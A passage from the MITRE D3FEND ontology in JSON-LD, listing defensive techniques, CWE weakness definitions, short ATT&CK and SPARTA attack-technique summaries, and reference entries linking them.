      "d3f:definition": "The product uses a scheme that generates numbers or identifiers that are more predictable than required.",
      "rdfs:label": "Generation of Predictable Numbers or Identifiers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:ExecutableAllowlisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExecutableAllowlisting",
        "d3f:PlatformHardening"
      ],
      "d3f:blocks": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:d3fend-id": "D3-EAL",
      "d3f:definition": "Using a digital signature to authenticate a file before opening.",
      "d3f:filters": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:kb-article": "## How it works\n\nThis technique is generic and there are numerous ways to compute and authenticate digital signatures.\nA digital certificate is generated from a private/public key pair issued by a certificate authority (CA). A hash of the file is encrypted using the private key. When the file is downloaded by another user, the user's system uses the public key to decrypt the hash and a new hash is created of the downloaded file. The hash decrypted by the public key is compared to the new hash and if there is a mismatch, further techniques, such as file deletion, file quarantine, or **Executable Blacklisting** may be invoked.\n\nThis technique may be invoked when deciding whether to load or execute a file.\n\n## Considerations\n\nOrganizations which download or create high volumes of software make management complex, in particular engineering or scientific organizations.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-EnhancingNetworkSecurityByPreventingUser-InitiatedMalwareExecution_"
        },
        {
          "@id": "d3f:Reference-ComputingApparatusWithAutomaticIntegrityReferenceGenerationAndMaintenance_Tripwire,Inc."
        }
      ],
      "d3f:synonym": "File Signature Authentication",
      "rdfs:label": "Executable Allowlisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:N13fba681f09349d3877c72b6d5792085"
        },
        {
          "@id": "_:N0b7fe9dfb02a4a73b688bee64af8389f"
        }
      ]
    },
    {
      "@id": "_:N13fba681f09349d3877c72b6d5792085",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N0b7fe9dfb02a4a73b688bee64af8389f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:DigitalText",
      "@type": "owl:Class",
      "d3f:definition": "Digital text is written content encoded in a digital format, allowing for storage, retrieval, and manipulation by electronic devices.",
      "rdfs:label": "Digital Text",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:T1137.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.005",
      "d3f:definition": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      },
      "rdfs:label": "Outlook Rules",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Ndc908a29910242bb966d89887b2a6288"
        }
      ]
    },
    {
      "@id": "_:Ndc908a29910242bb966d89887b2a6288",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:Software-definedRadioEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a software-defined radio (SDR) device indicating that the SDR's lifecycle state, operational state, configuration, data-streaming status, timing/reference status, or fault condition has changed.",
      "d3f:synonym": "SDR Event",
      "rdfs:label": "Software-defined Radio Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nf341088d0f5148f8bb352156e5e3cc0e"
        }
      ]
    },
    {
      "@id": "_:Nf341088d0f5148f8bb352156e5e3cc0e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:NetworkAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network agent is software installed on a network node or device that transmits information back to a collector agent or management system.  Kinds of network agents include SNMP Agent, IPMI agents, WBEM agents, and many proprietary agents capturing network monitoring and management information.",
      "d3f:synonym": "Exporter",
      "rdfs:label": "Network Agent",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:FileIntegrityMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileIntegrityMonitoring"
      ],
      "d3f:analyzes": {
        "@id": "d3f:File"
      },
      "d3f:d3fend-id": "D3-FIM",
      "d3f:definition": "Detecting any suspicious changes to files in a computer system.",
      "d3f:kb-article": "## How it Works\nThere are a number of tools in Windows and Unix that can monitor specific files in a system and generate alerts if any artifacts have been created, modified, or removed. They accomplish this by comparing the current artifacts to a previous snapshot.\n\nUnix - Unix systems have a file integrity checker tool called tripwire. Tripwire first initializes a database that serves as a basis for comparison and can then scan the system to compare the state of the current file system against the initial baseline database. Additionally, users can define policies that specify potential violations.\n\nWindows - In Microsoft Azure, file integrity monitoring can be enabled which can track file and registry key creation, removals, and modifications of specific files.\n\n## Considerations\nFiles can change constantly due to the non-static nature of a computer system. File Integrity Monitoring works best when pointed at a narrow scope of critical files to limit the number of unneccessary files that may be modified over the course of normal use. The accuracy and precision of defined policies also affect the efficacy of this technique.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FileIntegrityMonitoringinMicrosoftDefenderforCloud-Microsoft"
        },
        {
          "@id": "d3f:Reference-Tripwire"
        }
      ],
      "rdfs:label": "File Integrity Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N828431e24ea449c99207f47cc9648f7a"
        }
      ]
    },
    {
      "@id": "_:N828431e24ea449c99207f47cc9648f7a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DeadCodeElimination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DeadCodeElimination"
      ],
      "d3f:d3fend-id": "D3-DCE",
      "d3f:definition": "Removing unreachable or \"dead code\" from compiled source code.",
      "d3f:kb-article": "## How it works\n\nDead code is code that is considered unreachable by normal program execution. Dead code can be created by adding code under a condition that never evaluates to true. Dead code should be removed since this type of code can produce unexpected results, if accidentally or maliciously forced to execute.\n\nDead code identification is typically performed by algorithms that implement program flows analysis looking for unreachable code. The dead code is eliminated by instructing compilers to remove the code through compiler flags, i.e., '-fdce' is used for Dead Code Elimination.\n\n## Considerations\n\nCode can also be deemed unreachable for certain run-time conditions. Different deployed systems and environments may contain some code that is unreachable for the given environment. This technique does not consider run-time conditions for unreachable code.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DeadCodeElimination"
      },
      "rdfs:label": "Dead Code Elimination",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationHardening"
      }
    },
    {
      "@id": "d3f:CCI-001087_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements an information system isolation boundary to minimize the number of nonsecurity functions included within the boundary containing security functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001087"
    },
    {
      "@id": "d3f:Reference-SecurityConsiderationsForExchangingFilesOverTheInternet",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/files/pubs/shared/itlb/itlbul2020-08.pdf"
      },
      "d3f:kb-abstract": "This Information Technology Laboratory (ITL) Bulletin provides recommendations from the National Institute of Standards and Technology (NIST) for securely exchanging files over the Internet. It also explores several of the technologies currently available for doing so to educate readers on options they have.",
      "d3f:kb-author": "Karen Scarfone, Matt Scholl, and Murugiah Souppaya",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:kb-reference-title": "NIST ITL Bulletin August 2020 - Security Considerations for Exchanging Files Over the Internet",
      "rdfs:label": "Reference - Security Considerations for Exchanging Files Over the Internet"
    },
    {
      "@id": "d3f:Reference-IdentificationOfTracerouteNodesAndAssociatedDevices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10079749B2/en"
      },
      "d3f:kb-abstract": "Various embodiments pertain to communication network systems. In particular, various embodiments relate to multi-path probing in communication network systems that can be used to estimate the complete topology of the network. A method includes receiving data at a source node from a tracerouting probe in a network. The data includes information about at least one network node. The method also includes determining an identification for the at least one network node based on information. In addition, the method includes using the identification of the at least one network node to determine an identification of at least one device.",
      "d3f:kb-author": "Tomas KUBIK, Lan Li, Tomas RYBKA, Karlo ZATYLNY, Chris O'Brien",
      "d3f:kb-organization": "SolarWinds Worldwide LLC",
      "d3f:kb-reference-title": "Identification of traceroute nodes and associated devices",
      "rdfs:label": "Reference - Identification of traceroute nodes and associated devices"
    },
    {
      "@id": "d3f:DistributionProperties",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DP",
      "d3f:definition": "The properties derived from a probability distribution.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Probability distribution. [Link](https://en.wikipedia.org/wiki/Probability_distribution)",
      "rdfs:label": "Distribution Properties",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:CWE-698",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-698",
      "d3f:definition": "The web application sends a redirect to another location, but instead of exiting, it executes additional code.",
      "d3f:synonym": "Redirect Without Exit",
      "rdfs:label": "Execution After Redirect (EAR)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-670"
        },
        {
          "@id": "d3f:CWE-705"
        }
      ]
    },
    {
      "@id": "d3f:T1516",
      "@type": "owl:Class",
      "d3f:attack-id": "T1516",
      "d3f:definition": "A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android's accessibility APIs.",
      "rdfs:label": "Input Injection - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Input Injection"
    },
    {
      "@id": "d3f:M1048",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "\"Sandboxing\" is often used to describe a detection environment which includes some forms of analysis (see D3-DA.)\"  Many forms of isolation (e.g., quarantining) are more static in nature and simply limit software's access to system resources.",
      "d3f:related": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        }
      ],
      "rdfs:label": "Application Isolation and Sandboxing"
    },
    {
      "@id": "d3f:CWE-672",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-672",
      "d3f:definition": "The product uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.",
      "rdfs:label": "Operation on a Resource after Expiration or Release",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-666"
      }
    },
    {
      "@id": "d3f:CWE-760",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-760",
      "d3f:definition": "The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product uses a predictable salt as part of the input.",
      "rdfs:label": "Use of a One-Way Hash with a Predictable Salt",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-916"
      }
    },
    {
      "@id": "d3f:URLReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:URLReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:URL"
      },
      "d3f:d3fend-id": "D3-URA",
      "d3f:definition": "Analyzing the reputation of a URL.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Finding_phishing_sites"
      },
      "rdfs:label": "URL Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:N7f5e1ca45dad4cfb815f9d34d5f8fdae"
        }
      ]
    },
    {
      "@id": "_:N7f5e1ca45dad4cfb815f9d34d5f8fdae",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:T1127.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1127.003",
      "d3f:definition": "Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.(Citation: JamPlus manual)",
      "rdfs:label": "JamPlus",
      "rdfs:subClassOf": {
        "@id": "d3f:T1127"
      }
    },
    {
      "@id": "d3f:CWE-1107",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1107",
      "d3f:definition": "The source code uses symbolic constants, but it does not sufficiently place the definitions of these constants into a more centralized or isolated location.",
      "rdfs:label": "Insufficient Isolation of Symbolic Constant Definitions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:CWE-248",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-248",
      "d3f:definition": "An exception is thrown from a function, but it is not caught.",
      "rdfs:label": "Uncaught Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-705"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:narrower",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x narrower y: The entity x represents a more specific or focused concept than entity y.",
      "rdfs:label": "narrower",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:T1565.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1565.003",
      "d3f:definition": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "d3f:may-modify": {
        "@id": "d3f:ExecutableFile"
      },
      "rdfs:label": "Runtime Data Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1565"
        },
        {
          "@id": "_:Nd3cd822b5c8f4fadb183d34481262fbb"
        }
      ]
    },
    {
      "@id": "_:Nd3cd822b5c8f4fadb183d34481262fbb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-08-001%3ANTFSAlternateDataStreamExecution-SystemUtilities_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-08-001/"
      },
      "d3f:kb-abstract": "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. ADSs are also powerful because they can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using system utilities such as powershell.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities",
      "rdfs:label": "Reference - CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities - MITRE"
    },
    {
      "@id": "d3f:CWE-609",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-609",
      "d3f:definition": "The product uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient.",
      "rdfs:label": "Double-Checked Locking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:CWE-766",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-766",
      "d3f:definition": "The product declares a critical variable, field, or member to be public when intended security policy requires it to be private.",
      "rdfs:label": "Critical Data Element Declared Public",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1061"
        },
        {
          "@id": "d3f:CWE-732"
        }
      ]
    },
    {
      "@id": "d3f:T1596.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.004",
      "d3f:definition": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.",
      "rdfs:label": "CDNs",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:LoadLibraryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process dynamically loads a library or module into its memory space, extending its capabilities.",
      "rdfs:label": "Load Library Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/module_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:Ne81238ffbbe54d67862ce82a233ae833"
        },
        {
          "@id": "_:N8e064bb233ac4b4580e64bf23deb10eb"
        }
      ]
    },
    {
      "@id": "_:Ne81238ffbbe54d67862ce82a233ae833",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N8e064bb233ac4b4580e64bf23deb10eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-924",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-924",
      "d3f:definition": "The product establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission.",
      "rdfs:label": "Improper Enforcement of Message Integrity During Transmission in a Communication Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:obfuscates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x obfuscates y: The technique x makes the digital artifact y unclear or obscure.  Typically obfuscation is a way to hide a digital artifact from discovery, use, or both.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00942245-v"
      },
      "rdfs:label": "obfuscates",
      "rdfs:seeAlso": {
        "@id": "dbr:Obfuscation_(software)"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:evicts"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:T1399",
      "@type": "owl:Class",
      "d3f:attack-id": "T1399",
      "d3f:definition": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Modify Trusted Execution Environment - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Modify Trusted Execution Environment"
    },
    {
      "@id": "d3f:ApplicationProcessConfiguration",
      "@type": "owl:Class",
      "d3f:definition": "The current configuration of an application process, stored in memory. It may have been sourced from other types of application configurations, e.g. Application Configuration Files or Application Configuration Database Records.",
      "rdfs:label": "Application Process Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1550.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1550.002",
      "d3f:creates": {
        "@id": "d3f:Authentication"
      },
      "d3f:definition": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.",
      "rdfs:label": "Pass the Hash",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:N0ee30cc05f014306908371ccb119046c"
        }
      ]
    },
    {
      "@id": "_:N0ee30cc05f014306908371ccb119046c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:IA-0010",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0010",
      "d3f:definition": "Adversaries time their first execution to coincide with safe-mode, when the vehicle prioritizes survival and recovery. In many designs, safe-mode reconfigures attitude, reduces payload activity, lowers data rates, and enables contingency dictionaries or maintenance procedures that are dormant in nominal operations. Authentication, rate/size limits, command interlocks, and anti-replay handling may differ; some implementations reset counters, relax timetag screening, accept broader command sets, or activate alternate receivers and beacons to improve commandability. Ground behavior also shifts: extended passes, emergency scheduling, and atypical station use create predictable windows. An attacker who understands these patterns can present syntactically valid traffic that aligns with safe-mode expectations, maintenance loads, recovery scripts, table edits, or reboot/patch sequences, so the first accepted action appears consistent with fault recovery rather than intrusion.",
      "rdfs:label": "Unauthorized Access During Safe-Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0010/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Unauthorized Access During Safe-Mode"
    },
    {
      "@id": "d3f:restricts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x restricts y: The entity x bounds the use of entity y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00234091-v"
      },
      "rdfs:label": "restricts",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:isolates"
        }
      ]
    },
    {
      "@id": "d3f:LinuxOpenAt2ArgumentO_CREAT",
      "@type": "owl:Class",
      "d3f:definition": "Create a regular file. Extension of Linux Openat.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat2.2.html"
      },
      "rdfs:label": "Linux OpenAt2 Argument O_CREAT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:CAPECThing",
      "@type": "owl:Class",
      "rdfs:label": "CAPEC Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:DecoyObject",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyObject"
      ],
      "d3f:d3fend-id": "D3-DO",
      "d3f:definition": "A Decoy Object is created and deployed for the purposes of deceiving attackers.",
      "d3f:enables": {
        "@id": "d3f:Deceive"
      },
      "d3f:kb-article": "## Technique Overview\nDecoy objects are typically configured with detectable means of communication but do not have any legitimate business purpose. Any communication via or to these objects should be logged and analyzed to find potential indicators of compromise for a possible past or future attack against other systems.",
      "d3f:synonym": "Lure",
      "rdfs:label": "Decoy Object",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N8114d26fa3ef4e7b953dcdb60bad4c87"
        }
      ]
    },
    {
      "@id": "_:N8114d26fa3ef4e7b953dcdb60bad4c87",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Deceive"
      }
    },
    {
      "@id": "d3f:T1530",
      "@type": "owl:Class",
      "d3f:attack-id": "T1530",
      "d3f:definition": "Adversaries may access data from cloud storage.",
      "rdfs:label": "Data from Cloud Storage",
      "rdfs:subClassOf": {
        "@id": "d3f:CollectionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-004%3AUnusualChildProcessForSpoolsv.ExeOrConnhost.Exe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-004/"
      },
      "d3f:kb-abstract": "After gaining initial access to a system, threat actors attempt to escalate privileges as they may be operating within a lower privileged process which does not allow them to access protected information or carry out tasks which require higher permissions. A common way of escalating privileges in a system is by externally invoking and exploiting spoolsv or connhost executables, both of which are legitimate Windows applications. This query searches for an invocation of either of these executables by a user, thus alerting us of any potentially malicious activity.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe",
      "rdfs:label": "Reference - CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe - MITRE"
    },
    {
      "@id": "d3f:FTPRenameEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where files or directories on an FTP server are renamed, modifying their identifiers without altering their content or location.",
      "rdfs:label": "FTP Rename Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FTPEvent"
        },
        {
          "@id": "_:N246df48abcec47b594a048d2dd9d9b12"
        }
      ]
    },
    {
      "@id": "_:N246df48abcec47b594a048d2dd9d9b12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FTPPutEvent"
      }
    },
    {
      "@id": "d3f:Reference-OverviewOfTheSeccompSandbox",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://code.google.com/archive/p/seccompsandbox/wikis/overview.wiki"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:kb-reference-title": "Overview of the seccomp sandbox",
      "rdfs:label": "Reference - Overview of the seccomp sandbox"
    },
    {
      "@id": "d3f:CWE-807",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-807",
      "d3f:definition": "The product uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.",
      "rdfs:label": "Reliance on Untrusted Inputs in a Security Decision",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:TA0111",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Privilege Escalation - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Privilege Escalation"
    },
    {
      "@id": "d3f:T1102.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1102.003",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.",
      "rdfs:label": "One-Way Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1102"
      }
    },
    {
      "@id": "d3f:T1481.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481.003",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.",
      "rdfs:label": "One-Way Communication - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1481"
      },
      "skos:prefLabel": "One-Way Communication"
    },
    {
      "@id": "d3f:T1546.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.004",
